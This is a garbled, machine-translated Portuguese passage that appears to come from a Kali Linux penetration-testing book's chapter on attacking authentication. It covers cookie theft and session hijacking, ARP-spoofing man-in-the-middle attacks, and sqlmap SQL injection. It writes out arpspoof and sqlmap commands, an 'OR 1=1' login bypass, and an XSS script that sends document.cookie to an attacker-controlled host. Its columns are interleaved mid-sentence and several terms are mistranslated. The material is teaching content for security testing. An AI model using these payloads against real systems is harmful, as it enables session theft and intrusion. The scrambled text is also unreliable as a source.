injeta-lo em seu prprio navegador para a vida, se um token de sesso destino e, geralmente, colocado sobre site e obter informaes sobre o para ter acesso a sesso autenticada vlido capturado. um usurio do anterior da vtima. Muitos Web site no suportam logins ligao legtimo o que torna difcil de atividade. Isso pode incluir as pginas Essencialmente, o ato de substituir paralelas, que nega o uso de um detectar. que foram acessadas, como logado, bolinho no autorizado de um bolinho roubado. Para criar o seu prprio ataque de eo que atacante com uma vtima Sesso de Ferramentas Web clickjacking, voc pode usar a botes foram pressionados. Toda vez bolinho autorizado. A prxima seo ir cobrir as ferramenta por clickjacking Paul que voc entrar em um site, como o Existem algumas limitaes de ferramentas utilizadas para sesses Stone, Facebook, Gmail, ou ataques de seqestro de sesso: web de teste de penetrao. que pode ser baixado em: Wordpress, o seu browser atribui-lhe Algumas ferramentas no esto http://www.contextis.com/research/tool um biscoito. Roubar cookies intil se o alvo est disponveis em Kali1.0, no entanto, s/ [178] usando https:// para a navegao, e elas podem ser obtidas em linha. clickjacking-ferramenta /. criptografia end-to-end est habilitado. [179] Depois de ter baixado a ferramenta, Captulo 5 A adoo tem sido lenta, no entanto, a voc pode us-lo para ter o cdigo de Os cookies podem incluir a histria de maioria Atacando Autenticao outro rastreamento dos usurios por longos sites seguros fornecer essa defesa Plugins do Firefox site, como um boto de voto ou como perodos de tempo, incluindo contra ataques de seqestro de O mtodo manual para realizar um um boto. A ferramenta funciona com comportamento em um site de anos sesso. sequestro sesso est roubando a clickjacking atrs. Os cookies tambm podem Voc pode usar sslstrip como um autenticao da vtima Firefox 3.6. A ferramenta por Paul armazenar senhas e valores do mtodo para impedir que o seu alvo cookie. Uma maneira de conseguir Stone no ir funcionar com verses formulrio de estabelecer isso a injeo de um script em um mais recentes do Firefox; um usurio tenha previamente uma https conectar antes de lanar web comprometido no entanto, voc pode executar vrias preenchido, tal como seu endereo ou um sequestro de sesso ou outro servidor de aplicativos to cookies so verses do Firefox no arsenal nmero de carto de crdito. Este ataque. Ver capturados sem o conhecimento da incluindo Kali til para as empresas, tais como Captulo 3, os ataques do lado do vtima. A partir de Firefox 3.6 ou mais. varejo olhando para proporcionar uma servidor, para mais informaes sobre l, o atacante pode colher os cookies Website cdigo muitas vezes muda, experincia simplificada sslstrip. de autenticao e usar uma por isso certifique-se de ajustar os para os consumidores. Um token de ferramenta de cookie injetor seus ataques para sesso entregue a partir de um A maioria dos cookies expiram quando para substituir o cookie do atacante acomodar atualizaes que espelham servidor web a qualquer hora uma o alvo fizer fora de uma sesso. Este com um cookie roubado autorizado. o site confivel. srie tambm registra Outros mtodos utilizados Cookies de sesso Sequestro web para roubar cookies so packet usado para fazer Firesheep voar alteraes no contedo da Cole uma string Wireshark copiado na sniffing, o trfego de rede e operacional num ambiente Linux, no pgina web antes ou depois que a caixa de entrada e clique em Ok para comprometer hosts. Roubo entanto, pgina carregada. Greasemonkey injetar os cookies cookies sero abordados mais adiante Recomenda-se a utilizao de uma pode ser usado para personalizar uma na pgina atual. Veja o Wireshark neste livro. ferramenta mais actual. aparncia pgina web, as funes da seo sobre como copiar os cookies O navegador Firefox oferece muitos Web Developer - Plugin do Firefox web, a depurao, for Cookie encaixes que podem ser utilizados Web Developer uma extenso para combinando dados a partir de outras Injector utilizando Copy, Bytes, e para injectar biscoitos roubados Firefox que adiciona ferramentas de pginas, bem como outros fins. selecione Somente Texto para no navegador de um atacante. Alguns edio e depurao para Greasemonkey impresso no Wireshark. O prximo exemplos so GreaseMonkey, Cookie desenvolvedores web. Web Developer necessrio para fazer outras duas imagens mostram prementes Alt Manager e pode ser baixado gratuitamente a ferramentas, tais como cookies + C, colando um Dump Wireshark Firesheep. Sugerimos navegar na partir do plugin do Firefox Injector, funcionar corretamente. Cookie, e marketplace de plugins do Firefox loja. Uma caracterstica em Web Biscoito Injector - Plugin do Firefox clique Ok para ver o pop-up que os para vrios biscoitos Developer til para seqestro de Biscoito Injector um script de usurio cookies capturados foram escritos no ofertas de gerenciamento para sesso a capacidade de editar que simplifica o processo de Navegador da Internet. atender s suas exigncias de cookies. Isto pode ser encontrado manipulao de navegador [182] penetrao. como uma opo de drop-down a cookies. H uma srie de etapas Firefox e todos os plugins associados partir do navegador Firefox uma vez manuais para importar um cookie de Captulo 5 no so instalados por padro Web Developer instalado, como uma ferramenta como o Wireshark Os cookies Gestor + - Plugin do Kali em Linux 1.0. mostrado na imagem seguinte: em um navegador web. Biscoito Firefox Firesheep - Plugin do Firefox [180] Injector permite ao usurio copiar e Os cookies Gestor + um utilitrio Firesheep uma ferramenta clssica colar uma parte do bolinho de usado para visualizar, editar e criar Teste de Invaso usado para auditar Captulo 5 um lixo, e ter os cookies do despejo novos cookies. Biscoito sesses web. Firesheep Selecionar Ver Informaes Cookie, e criado automaticamente no momento Gerente + mostra informaes uma extenso para o navegador voc vai ver os cookies armazenados. visto pgina web. detalhadas sobre cookies, bem como Firefox, no entanto, algumas verses Voc pode clicar Voc deve ter Greasemonkey pode editar mltipla tm sido em Editar Cookies para abrir o editor instalado para utilizar o script Injector biscoitos de uma vez. Cookie Manager instvel com recentes lanamentos do de cookie e substituir o cookie atual Cookie. + tambm pode fazer backup e Firefox. Firesheep atua como um com um Para instalar cookies Injector, restaurar os cookies. Voc pode farejador de pacotes que intercepta biscoito roubado da vtima. pesquisa no Google para Biscoito baixar Cookie Manager + a partir da os cookies no criptografados de Greasemonkey - Plugin do Firefox Injector para abrir um download loja plugin do Firefox. sites, enquanto que transmitem [181] ligao para o script. Quando voc Uma vez instalado, Cookie Manager + atravs de uma rede. selecionar o download de Cookies pode ser acessado em Ferramentas, Plugin do Firesheep para o Firefox Atacando Autenticao Injector, Greasemonkey ir seleccionando oficialmente suportado no Windows e Greasemonkey um plugin do Firefox pop-up, o que levou a sua aprovao Os cookies Gestor +. MAC, tornando-se incmoda para que permite aos usurios instalar para a instalao. Os cookies Gestor + ir mostrar-lhe operar em Linux. Trabalho feito sob scripts que fazem no Depois de instalar o script de Cookies todos os cookies capturados pelo encomenda pode ser Injector, pressione Alt + C para exibir o Firefox. Voc pode rolar dilogo cookie. para baixo ou procurar Cookie (s) Biscoito Cadger pode ser baixado a nomes de host. Voc pode copiar os um cookie de domnio capturado da especfico para visualizar e / ou editar. partir de www.cookiecadger.com. O pedidos para a caixa de clipe e vtima. Uma vez que a carga est No meu exemplo, eu estou download exportao de informaes, tais como completa, o padro procura de qualquer cookie ser um arquivo JAR. D um duplo informaes do usurio, e endereos Navegador de Internet ir abrir a associado clique no arquivo para abri Biscoito MAC. Guias de filtro esto disponveis pgina capturada com os direitos www.thesecurityblogger.com. Cadger. Um aviso ser para cada seo para associados ao [183] pop-up perguntando se voc deseja zero em alvos especficos (por bolinho roubado. ativar a deteco de sesso. Clique exemplo, apenas olhando para os Para ver as informaes de solicitao Atacando Autenticao em Sim, eo principal domnios do Facebook). de sesso, clique com o boto direito Os cookies Gestor + torna fcil editar painel ir aparecer. As prximas duas Sempre Biscoito Cadger reconhece no cone da sesso capturado os cookies existentes. Isto pode ser imagens mostram o Cookie Cadger uma sesso de login, ele captura-lo e e selecione Ver Associado Request. til para 1.0 d a capacidade Isso o levar de volta para a Pedidos realizao de vrios tipos de ataques, Arquivo JAR com a mensagem de para carregar a sesso. A imagem aba como seqestro de sesso e injeo aviso introduo pop-up e cookies seguinte mostra uma captura de e mostrar que sesso. de SQL. principal sesso do administrador Wireshark Biscoito Cadger Cadger painel. registrando em Wireshark um dos o protocolo de Biscoito Cadger uma ferramenta de [184] www.thesecurityblogger.com. Biscoito rede mais popular fonte, livre e aberto teste de penetrao usado para Cadger mostrar um cone e analisadores. Wireshark pr- auditar sesses web. Biscoito Captulo 5 explicar o tipo de sesso capturado. instalado em Kali e ideal para soluo Cadger pode incluir solicitao HTTP Para comear, selecione a interface Este poderia ser um Hotmail, de problemas de rede, detalhada captura e reproduo de apropriada, e clique em Iniciar Facebook, ou neste anlise, e para este captulo, uma HTTP inseguro captura. Biscoito Cadger exemplo, Wordpress de login. ferramenta perfeita para monitorar o Requisies GET, como itens oferece a possibilidade de tomar em [186] trfego de potenciais alvos solicitados, agentes de utilizador, mltiplas interfaces, se disponvel. com o objetivo de capturar os tokens referrer e autorizao bsico. [185] Captulo 5 de sesso. Wireshark usa um widget Biscoito Cadger pode fornecer uma Para ver as sesses reconhecidos, toolkit GTK + para anlise ao vivo para Wi-Fi e redes Atacando Autenticao clique na aba Sesses reconhecidos implementar a sua interface de com fio, bem como Biscoito Cadger pode enumerar todos e pegar uma sesso a partir da janela, usurio e pcap para capturar pacotes. carga de captura de pacotes arquivos os dispositivos encontrados na rede como mostrado na imagem anterior. Ele opera de forma muito semelhante (PCAP). Biscoito Cadger tambm disponvel. Uma vez ao inclui deteco de sesso para Por exemplo, a imagem seguinte realado, clique no Carregar Sesso umatcpdump comando, no entanto, determinar se o usurio est mostra um i686 Linux usando o Selecionado boto para repetir a atuando como uma interface grfica conectado em pginas web como Firefox e Iceweasel. sesso. Biscoito com a classificao integrado Wordpress e Facebook. Biscoito Atividades recentes encontrado por Cadger ir exibir Carregando na janela e opes de filtragem. Cadger considerado por alguns Cookie Cadger exibido no texto azul inferior, e um navegador abrir logged [187] como Firesheep em esterides. para cada campo. como o usurio durante a sesso O Biscoito Cadger no vem com Kali Voc pode visualizar detalhes sobre o capturado. A figura a seguir mostra Atacando Autenticao 1.0. local onde o anfitrio o surf, nomes abertura como netbios e Wireshark pode ser encontrado em padro criptografada, no entanto, Hamster um utilitrio usado para acessando Sniffing / Spoofing |Sniffers Sniffing / Spoofing |Sniffers de rede, e voc pode desativar o https e procurar roubar cookies com seqestro de Web e selecionando Ferret. ATerminal selecionando o GX parmetro sesso HTTP com passivo janela pop-up com algumas opes. Wireshark bem como sob a Top 10 contido numa http.cookie para sniffing tambm conhecido como Digite furo-i INTERFACE para Ferramentas de segurana categoria. identificar os cookies do Gmail no Sidejacking. Hamster escuta em uma selecionar Para comear a capturar o trfego, garantidos. A sequncia rede, captura qualquer a interface para farejar com Ferret. selecione o Captura e separador imagem mostra captura o cookie de cookies de sesso visto, e as Ferret ir dizer-lhe que est cheirando Interfaces. Voc vai ver o login em um blog Wordpress: importaes roubado biscoitos em um eo comando interfaces disponveis para captura. [189] ambiente GUI navegador para aviso ir pendurar em um estado de No meu exemplo, eu estou indo para o atacante pode repetir a sesso. execuo. Como voc pode ver o selecionar eth0 clicando em Atacando Autenticao Hamster usa Ferret para pegar trfego, a captura de trfego ser na caixa de seleo ao lado de eth0 e Uma vez que voc capturar um cookie cookies de sesso. exibida selecionando Iniciar. sem garantia, voc deve usar uma Hamster pode ser acessado por como texto em Ferret. Voc no pode ver o trfego se a outra ferramenta para injet-lo em navegar para Sniffing / Spoofing [191] interface de rede em que voc est seu navegador para completar o |WebSniffers e captura no suporta o modo seqestro de sesso. Escolha o selecionando Hamster. Atacando Autenticao promscuo, ou porque o cookie vtimas, com o boto direito Quando voc inicia Hamster, um Uma vez Ferret est em execuo, OS no pode colocar a interface em clique na linha, e selecione Cpia Terminal abrir o incio do servio de navegar de volta para Hamster, e voc modo promscuo. Mais informaes |Bytes |Texto para impresso Hamster. O deve comear a sobre o somente. Agora, voc pode colar IP proxy padro ser 127.0.0.1:1234. veja pacotes. Todas as metas da rede diferentes modos de captura e soluo isso em um Injector Cookie, como o Voc pode acessar Hamster abrindo aparecer. Clique em um alvo para de problemas pode ser encontrada em Firefox plugin do Biscoito Injector. um navegador e navegar para ver www.wireshark.org. Veja Cookies http://127.0.0.1:1234. biscoitos capturadas. [188] Injector para completar o ataque [190] Clique em qualquer cookie para seqestro de sesso em plugins do acessar a sesso de captura. No meu Captulo 5 Firefox. Captulo 5 exemplo, eu repetir acessando Wireshark ir capturar todo o trfego Voc deve ter o Greasemonkey e O trfego deve viajar atravs do www.thesecurityblogger.com. visto no fio. O trfego pode ser filtrado, Cookies Injector para copiar / colar hamster para que ele faa o seu [192] digitando no navegador Firefox. trabalho. Voc pode selecionar qual itens especficos no espao de Existem muitas ferramentas teis adaptador Captulo 5 filtrao ou por ajustamento da disponveis que suportam captura usar clicando no link adaptadores. Man-in-the-middle ataque organizao de dados atravs do topo Wireshark e simplificar Para o meu exemplo, eu estou indo Um ataque man-in-the-middle uma tabelas, como protocolo ou destinos. foram encontrados dados. Um para farejar eth0. forma de escuta ativa em que o Wireshark captura um monte de exemplo o NetWitness Investigator Hamster est redireccionado para atacante detalhes, por isso importante para que pode ser baixado gratuitamente uma pgina de atividade Sidejacking. faz uma conexo com as vtimas e filtrar por coisas especficas, a partir de www.emc.com. Voc vai notar que no so retransmite mensagens entre as como parmetros para os cookies no Hamster e Ferret receber quaisquer pacotes. Hamster vtimas, tornando-os garantidos como http.cookie. Por precisa de um sniffer para pegar exemplo, o Gmail por trnsito. Voc pode usar Ferret acredito que eles esto falando arpspoof usada quando um atacante Atacando Autenticao |Sniffers de rede, e selecionando diretamente para o outro. H muitas envia falso Address Resolution TERMINAL 1: dsniff. ATerminal janela ser aberta, formas de este ataque, Protocol (ARP) arpspoof-t 172.16.76.128 172.16.76.2 exibindo como o uso de um roteador sem fio mensagens em uma rede de rea / / diz vtima 2 voc o os comandos de uso para dsniff, como Hak5 abacaxi que pretende ser uma local. O objetivo deste processo gateway padro mostrado na imagem seguinte: rede sem fio confivel associar o TERMINAL 2: Para iniciar dsniff, tipo dsniff e ponto de acesso, enquanto realmente endereo MAC do atacante com o arpspoof-t 172.16.76.2 172.16.76.128 selecione a interface para farejar agindo como um man-in-the-middle endereo IP de outro host, fazendo / / diz vtima 1 voc o usando -I e a entre vtima e com que todo o trfego gateway padro interface. Para o meu exemplo, eu rede sem fio. Outro exemplo usar voltados para o endereo de IP para Se voc digitar os comandos digitei dsniff para capturar todo o Kali para encaminhar o trfego entre ser enviado para o atacante vez. corretamente, voc deve ver que o trfego em eth0 como mostrado uma vtima Um mtodo manual para realizar uma trfego est sendo reproduzido na imagem seguinte: eo roteador padro, enquanto sniffing man-in-the-middle est usando atravs do sistema de ataque. Trfego dsniff vai pegar todas as informaes para informaes teis, tais como arpspoof e dsniff no est indo para e da vtima, de de login. Se a vtima registra em um credenciais de login. a sentar-se entre os sistemas. O modo a sistema via FTP para Muitos servios em nuvem como o primeiro passo identificar o endereo vtima no iria ver o trfego que vai exemplo, voc vai ver a tentativa de Facebook eo Gmail alavancagem IP da sua vtima para fora da rede neste momento. login e credenciais uma vez que a login seguro eo gateway padro da rede, utilizando Para completar o sesso fechada, via HTTPS, o que impede um ataque tcnicas de Captulo 2, ataque, voc precisa habilitar IP para porque dsniff precisa ver toda a genrico man-in-the-middle. Para Reconnaissance frente para que o trfego continuar a sesso. ignorar - Conceitos Bsicos, Depois de saber fluir a partir do padro [195] HTTP seguro, voc pode usar sslstrip, os endereos de IP, voc precisa dizer porta de entrada para a vtima e vice- que ir revelar todas as informaes a sua vtima voc versa, enquanto o atacante est Atacando Autenticao de login so realmente um outro sistema ou o observando o trfego entre Ettercap ao seu ataque man-in-the-middle. O gateway padro. Por exemplo, se uma a vtima eo gateway padro. Ettercap um conjunto abrangente sslstrip / man-in-the-middle vtima Abra um tero Terminal janela e digite: livre e de cdigo aberto para o man-in- combinao um mtodo muito eficaz 172.16.76.128, o gateway padro echo 1> / proc/sys/net/ipv4/ip_forward the-middle baseados- para roubar credenciais de login da 172.16.76.2 eo invasor Neste ponto, o trfego deve fluir entre ataques. vtima, se 172.16.76.131, a vtima eo gateway padro, enquanto Ettercap pode ser usado para anlise voc tem um sistema de ataque na voc deve definir o seu endereo IP indo atravs do sistema invasor. A de protocolo de rede de computadores mesma rede que o sistema (s) alvo. 131 para se parecer com a vtima e figura a seguir mostra o de ping falhar e auditoria de segurana, dsniff e arpspoof gateway padro usando enquanto para a frente IP no est com sniffing conexes ao vivo, dsniff um conjunto de senha sniffing o comando arpspoof. habilitado. filtragem de contedo e suporte para e ferramentas de anlise de trfego de Abrir dois Terminal janelas e digite os [194] ativa e passiva rede projetados para seguintes comandos em cada janela disseco de vrios protocolos. analisar diferentes protocolos de para Captulo 5 Ettercap trabalha pondo rede do aplicao e extrair informaes falsificar suas vtimas: Em seguida, lanar dsniff para assistir atacante relevantes. [193] ao trfego. dsniff pode ser encontrado em Sniffing / Spoofing interface em modo promscuo e ARP e um roteador para um ataque lanar o seu ataque man-in-the-middle ter dito emalhe para exibir imagens, para o envenenamento das mquinas clssico man-in-the-middle. Selecione antes de lanar redes de deriva. eles aparecero nesta janela. Se voc vtima. cada alvo, e clique no Emalhe pode ser selecionou Para iniciar Ettercap, navegue at caixa de seleo apropriada. Voc executados simultaneamente para no para exibir imagens, como o uso - Sniffing / Spoofing |Sniffers de rede e pode verificar as metas, navegando dar-lhe rapidamente a visibilidade de Um, As imagens no aparecem, no selecione at Alvos e todas as imagens voando entanto, ser enviados para o Ettercap grfica. selecionando Alvos atuais. o fio. a pasta especificada no comando de O primeiro passo selecionar qual [197] [198] execuo. A imagem seguinte interface voc pretende farejar. emalhe Navegue at a Farejar tab, Atacando Autenticao Captulo 5 a captura de imagens a partir de um selecionar o tipo de sniffing (Unified Em seguida, podemos olhar para as Emalhe pode ser encontrado em surf vtima www.drchaos.com. sniffing ou Sniffing em ponte) ea opes de man-in-the-middle Sniffing / Spoofing |Sniffers Web e [199] interface voc planeja encontradas embaixo da aba MITM. selecionando para farejar. H opes para Envenenamento ... Emalhe. Emalhe abrir como um Atacando Autenticao [196] Arp, ICMP redirecionar ..., Port roubar Terminal mostrando como usar a SQL Injection ..., e Dhcp ferramenta. Voc ir Um banco de dados armazena dados Captulo 5 spoofing .... Para este exemplo, precisa especificar qual interface voc e organiza-lo em algum tipo de forma Agora, Ettercap vai mostrar mais vamos selecionar Arp envenenamento quer cheirar eo que voc quer fazer lgica. Oracle e opes de menu, como mostrado na ... e escolher o Farejar com Microsoft SQL so exemplos imagem seguinte: conexes remotas parmetro. imagens captadas fora do fio. Por populares de sistemas de Vamos verificar a rede para hosts Agora, estamos prontos para capturar exemplo, voc pode optar por ter um gerenciamento de banco de dados disponveis. Navegue para os Hosts e o trfego entre o roteador e nosso sinal sonoro que permitem selecione Digitalizar para vtima. Interessante para cada imagem usando o -B usurios para criar vrios tipos de hospedeiros. Ettercap rapidamente informaes, tais como nome de imagens de comando, exibio na tela bancos de dados usados para digitalizar toda a classe Ce listar todos usurio e senha, podem ser do terminal, ou armazenar, consultar e organizar os hosts identificados. Geralmente capturados e enviar imagens capturadas para um dados o roteador o primeiro anfitrio que se exibido na janela de execuo. diretrio. A captura de tela fornecido de forma criativa. encontra. A figura a seguir mostra Emalhe mostra um exemplo de Structured Query Language, que quatro dispositivos Emalhe uma ferramenta de man-in- a captura de imagens a partir de eth0 mais conhecido como SQL, o encontrado durante uma verificao. the-middle usado para capturar e colocando as imagens em uma sublinhado Neste exemplo, encontramos quatro imagens de trfego de rede ao vivo. pasta localizada no / Root / linguagem de programao comum dispositivos. Podemos supor .1 o Emalhe exige um ataque man-in-the- Desktop / CapturedImages. que entendido pela maioria de roteador, e ns middle a ser estabelecido antes de O exemplo a seguir supe um ataque gerenciamento de banco de dados ser alvo da mquina da vtima 0,128. trabalhar. Voc existente man-in-the-middle sistemas. Ele fornece uma maneira Vamos selecionar o roteador para pode aproveitar a arpspoof e dsniff ou estabelecida usando eth0 como a comum para a aplicao para acessar Meta 1 e mtodos Etthercap anteriormente porta de escuta. os dados no banco de dados a vtima 0,128 para Meta 2. Isto ir coberto para Depois de emalhe lanado, um usando um conjunto comum de colocar o nosso sistema entre a vtima separado em branco Terminal janela comandos no banco de dados pode pop-up. Se voc entender. Os atacantes exploram esses bancos O plugin de Firefox HackBar vai deixar vulnervel a injeo de SQL, porque ampla gama de recursos de testes de de dados, tornando-os informaes de voc testar consultas SQL e injetar o servidor est respondendo a erros penetrao que variam de banco de sada que suas prprias consultas de SQL. dados de impresses digitais no devem ser visualizadas. s vezes, para mudar solicitaes SQL. O plugin Vamos colocar em injeo SQL, para acessar o sistema de arquivos isso to simples como o atacante HackBar tambm ir permitir que um adicionando um OR 1 = 1 # # subjacente e executar comandos no pedindo verificador da penetrao declarao no final de sistema operacional informaes privilegiadas do sistema examinar as informaes HTTP a linha. sistema atravs de ligaes de fora- de gerenciamento de banco de dados. POST. Uma vez que executar o cdigo, que de-banda. Outras vezes, [200] est conectado como administrador Os recursos incluem suporte para aproveitando configuraes pobres para www.drchaos.com. sistemas de gerenciamento de banco por administradores de banco de Captulo 5 [202] de dados comum, o apoio dados. Atacantes podem No exemplo a seguir, vamos tentar muitas tcnicas de injeo SQL, tambm tirar proveito de uma realizar uma injeo de SQL no site Captulo 5 usurios, enumerando os hashes de vulnerabilidade no sistema de DrChaos.com. Vamos navegar para Temos remendado www.DrChaos.com senha, e muitos gerenciamento de banco de dados www.DrChaos.com usando o Firefox para que ele no vulnervel a este outros. SqlMap tambm apoia o que em nosso Kali ataque. processo de banco de dados 'user permite que o invasor ver ou escrever console do servidor e tentar entrar no No entanto, voc pode ver injees escalonamento de privilgios usando comandos privilegiados de e para o site. Primeiro, vamos tentar o nome de SQL so muito valiosos para o ataque, Meterpreter do Metasploit getsystem banco de dados. usurio porque eles comando. Atacantes tipicamente enviar cdigo administrador ea senha 12345 se dar um verificador da penetrao da SqlMap uma ferramenta que pode malicioso atravs de formulrios ou de autenticar. Voc ver que ir falhar. web um mtodo fcil para obter ser usada para explorar servidores de outras partes de uma pgina web Agora, navegue at o Vista barra de acesso total a um sistema. banco de dados e construdo em que tm a capacidade de aceitar a menus no Firefox e selecione o Sucesso injeo de SQL Kali. Para entrada do usurio. Por exemplo, um HackBar menu. Clique dependente do conhecimento SqlMap usar, voc vai precisar para atacante pode entrar aleatria o Carga URL boto e clique no Ativar atacantes de comandos SQL. Se apontar a ferramenta para uma URL personagens, bem como as dados Postar boto. Voc vai ver a voc precisa escovar acima em suas de um script SQL em um servidor declaraes de comprimento, com o URL que habilidades de SQL, recomendamos web. objetivo de identificar a fraqueza na foram entrando em, bem como o olhando W3 School of SQL Estes podem ser identificados porque forma como nome de usurio e senha que apenas em: eles geralmente tm php na URL. as variveis de entrada e parmetros tentada. http://www.w3schools.com/sql/sql_intr Voc pode encontrar SqlMap sob so concebidos. Se um campo de [201] o.asp. Anlise Vulnerabilty |Avaliao do entrada est definido para aceitar SqlMap banco de dados | apenas Atacando Autenticao SqlMap automatiza o processo de SqlMap. ATerminal janela ser aberta usernames at 15 caracteres, uma Vamos agora adicionar uma aspa deteco e explorao de falhas de exibindo a pgina SqlMap ajuda. mensagem de erro pode aparecer simples aps o nome do usurio injeo SQL e A sintaxe bsica para usar SqlMap : revelando detalhes administrador. Assim que tomando conta de servidores de SqlMap-u URL - funo sobre como o banco de dados est clicamos na Executar boto, ns banco de dados. SqlMap vem com um Uma funo comum dbs. O dbs configurado. recebemos uma injeo de SQL. Isso mecanismo de deteco, bem como palavra-chave ter SqlMap obter os pode significar o servidor um bancos de dados. SqlMap-u SqlMap-u servidores web que tiveram dados Google criou o projeto Gruyere como http://www.drchaous.com/article.php?i http://www.drchaous.com/article.php?i roubados, foi resultado de cross-site um meio para testar exploits aplicao d=5 - dbs d=5 scripting. web Voc pode ver a partir de nossos - colunas Ataques cross-site scripting resultaram e defesas. site O projeto Gruyere tem resultados, temos vrias bases de -T tablesnamehere em atacantes desfigurar sites, vrias vulnerabilidades embutidos dados que foram encontrados. Para Se houver alguma informao distribuindo para ele, incluindo XSS. Voc pode esta relevante nas tabelas, ele pode ser malwares para os clientes, e roubar executar o seu prprio projeto de exemplo, vamos concentrar-se no recuperado usando o informaes sensveis a partir de Gruyere on-line, ou voc pode banco de dados de teste. seguinte comando: sites, como o crdito transferi-lo para uma mquina local [203] SqlMap-u carto e outras informaes de para o seu teste. http://www.drchaous.com/article.php?i identificao pessoal. Uma vez que foram registrados em Atacando Autenticao d=5 [204] nossa prpria instncia de Gruyere, Depois de ter encontrado um servidor teste - despejo fomos capazes de copiar o web vulnervel, voc seleciona o -U teste-dump Captulo 5 seqncia anterior no campo de banco de dados usando o -T-L tablesnamehere Um mtodo para verificar se h entrada nome de usurio e clicar no -D comando e o nome da base de Isso ir criar um arquivo chamado vulnerabilidades cross-site scripting Submeter boto. O dados. teste, E despejar toda a informao verificar se uma entrada imagem seguinte mostra a home page SqlMap-u teste bruta do campo, como uma caixa de pesquisa, com o Gruyere CHAOS roteiro http://www.drchaos.com/article.php?id tabela de banco de dados para esse vulnervel. Um exemplo que pode exibido. =5-D arquivo. Em muitos casos, isso pode ser utilizado para testar um A cadeia utilizada no campo de - tabelas incluir senhas e outras campo de entrada em um site est entrada a seguinte: O mesa palavra-chave usada para informaes confidenciais. usando a seqncia de pesquisa CHAOS <script> alert recuperar todas as tabelas no teste Cross-site scripting (XSS) simples da seguinte maneira: ('www.DrChaos.com') </ script> banco de dados em nosso web Cross-site scripting (XSS) uma CHAOS <script> alert [205] servidor. Vemos que temos vulnerabilidade encontrada em ('www.DrChaos.com') </ script> recuperado com xito duas tabelas, aplicaes web. XSS permite Voc pode usar o script anterior para Atacando Autenticao administrador e contedo. atacantes para injetar os scripts no testar qualquer site no entanto, no Uma vez que executou o script de Uma vez que voc execute o seguinte site. Esses scripts podem ser usados recomendamos XSS no campo de entrada nome de comando, SqlMap ir exibir todas as para manipular introduzir a corda em cada site que usurio, notamos algum cdigo foi tabelas: o servidor web, ou os clientes que se voc se deparar, como poderia alertar exibido no site. Neste ponto, ns SqlMap-u conectam ao servidor web. as metas de seu fomos capazes de gerar um alerta http://www.drchaous.com/article.php?i Cross-site scripting foi responsvel por intenes maliciosas. Se voc optar pop-up d=5 uma grande maioria de ataques por usar um script semelhante para sempre que o nome de usurio era Teste D-- tabelas baseados na web populares. testar cross-site scripting, visto no site. Colunas especficas podem ser Muitas vezes, quando minha equipe certifique-se de usar um outro site que Alm disso, http://xss.progphp.com/ selecionados usando o seguinte solicitada pelos clientes para examinar no seja www.DrChaos.com no script. um outro site popular para testar comando: comprometida Testando cross-site scripting ataques XSS e scripts. Voc pode ter vrios scripts e introduzi-lo no site para ver como XSS interage com sites e seu prprio sucedido), basta compartilhar a URL Para o nosso exemplo, a nossa O foco deste livro est alavancando navegador web de forma segura. completa com primeira conta intitulado TheDude. ferramentas disponveis no Kali Linux, Cookie de XSS roubo / Autenticao seu amigo, incluindo a sua Em seguida, vamos para o trecho no entanto, o melhor seqestro identificao nica. seo e criar um novo trecho. Iremos Testadores de penetrao usam uma Script kiddies pode usar XSS para a No use a mesma senha para sua introduzir um script de XSS aqui como variao de ferramentas disponveis gerao de alertas pop-up no entanto, conta Gruyere como voc usa para mostrado na do setor, como Kali Linux, e como um profissional qualquer servio real. tela a seguir: ferramentas personalizadas, como Verificador da penetrao, o valor real Vamos examinar um exemplo do uso Sabemos Gruyere tem scripts XSS de violao alvos. de XSS para obter acesso de uma vulnerabilidade XSS para vulnerabilidades XSS embutido, e, Sugerimos a investigar este tema privilegiado a um sistema. roubar um cookie de sesso. portanto, estamos usando e testar novos scripts contra o seu A prxima seo ir examinar como Se voc tentar esta tcnica em uma um script. No mundo real, podemos alvo exemplo Gruyere para dominar a fazer isso. Se voc no tiver feito isso, rede local, o Kali caixa e servidor web usar o mesmo script em qualquer habilidade de criar vulnervel campo em um alvo construir e executar ataques de script seu prprio exemplo Gruyere online deve ser capaz de comunicar. Como site para testar se vulnervel a XSS. personalizado. para testar conceitos a prxima seo. estamos usando projeto Gruyere, Por exemplo, se soubssemos Outras ferramentas Navegue at http://google- precisvamos Facebook foi urlsnarf gruyere.appspot.com/start. App colocar nossa caixa de Kali Linux na vulnervel a um ataque XSS explorar Aqui esto algumas outras Engine ser iniciado Internet com um endereo IP voltados o campo nome do meio, um invasor ferramentas que seguem o tema deste uma nova instncia de Gruyere para ao pblico, de modo Kali Linux precisa criar um perfil e usar este Chatper e disponvel em Kali voc, atribuir-lhe uma identificao pode se comunicar corretamente com script como o seu nome do meio. Linux: nica e redirecion-lo para o servidor Gruyere alvo. [207] urlsnarf uma ferramenta que gera http://google- [206] todas as URLs solicitadas cheirou de gruyere.appspot.com/123456/ (Onde Atacando Autenticao trfego HTTP em 123456 o nico Captulo 5 Facebook no explorvel usar este Formato de log comum (CLF, usado ID para este exemplo). Normalmente, dando Kali Linux um ataque. apenas um exemplo por quase todos os servidores web), Cada instncia de Gruyere est endereo IP pblico realmente uma hipottico. adequado para off-line completamente isolado de todos os m Entramos no seguinte cdigo: ps-processamento com o seu web outros casos, para que o seu prtica. Executar este passo pode <script> document.write ("<img src = log anlise ferramenta favorita instncia no ser afetado por significar a abertura de firewalls e 'http://kali.drchaos.com/var/www/xss_ (analgico, wwwstat e qualquer outra pessoa usando tendo Kali Linux exposta a ataques laboratrio / lab_script.php? "+ assim por diante). Gruyere. Voc precisa usar o seu remotos. document.cookie +"> ") </ script> Para acessar urlsnarf, navegue at identificao nica, em vez de 123456 Quando voc entrar em Gruyere, crie Embora as palavras pode envolver em Sniffing / Spoofing |Sniffers de rede e em todos os exemplos. um nome de usurio, clicando no torno de como voc digitar o selecionar urlsnarf. A Terminal ir Se voc quiser compartilhar o seu Inscrever-se boto comando, ele precisa aparecer apresentando opes de trabalho e projeto de concluir em na tela lado superior direito, como ser um nico comando de linha. uso, como mostrado na Gruyere com algum mostrado na imagem seguinte: Este apenas um dos muitos scripts a tela a seguir: outra coisa (por exemplo, para Para este exerccio, criamos duas que podem ser usados para explorar Para usar urlsnarf, tipo urlsnarf-i ea mostrar-lhes um ataque bem- contas separadas. Vamos entrar com um sistema vulnervel. interface que voc deseja monitorar. a primeira conta. urlsnarf ir mostrar que est ouvindo. Esta calcular os campos de checksum e autenticar. Comeamos, fornecendo Firewalls, IPS / IDS, produtos de captura de tela a seguir mostra tamanho do pacote de protocolos TCP uma 